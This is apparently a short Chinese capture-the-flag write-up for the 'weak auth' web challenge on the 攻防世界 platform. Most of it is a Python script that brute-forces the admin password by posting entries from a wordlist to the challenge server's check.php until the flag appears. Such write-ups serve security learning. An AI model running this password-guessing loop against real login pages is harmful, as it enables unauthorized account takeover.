攻防世界——Web——weak auth

  本题可以用burp suite进行密码爆破，这里主要记录用Python脚本处理的方法，脚本如下

# -*- coding:utf-8 -*-
import requests

ur1 = "http://111.200.241.244:57516/check.php"

with open("wordlist.txt", "r") as f:
    for line in f.readlines():
        data1 = {"username":"admin", "password":line.strip()}
        flag = requests.post(ur1, data = data1).content.decode("utf-8")
        print(flag)
        if "cyberpeace" in flag:
            print(flag)
            break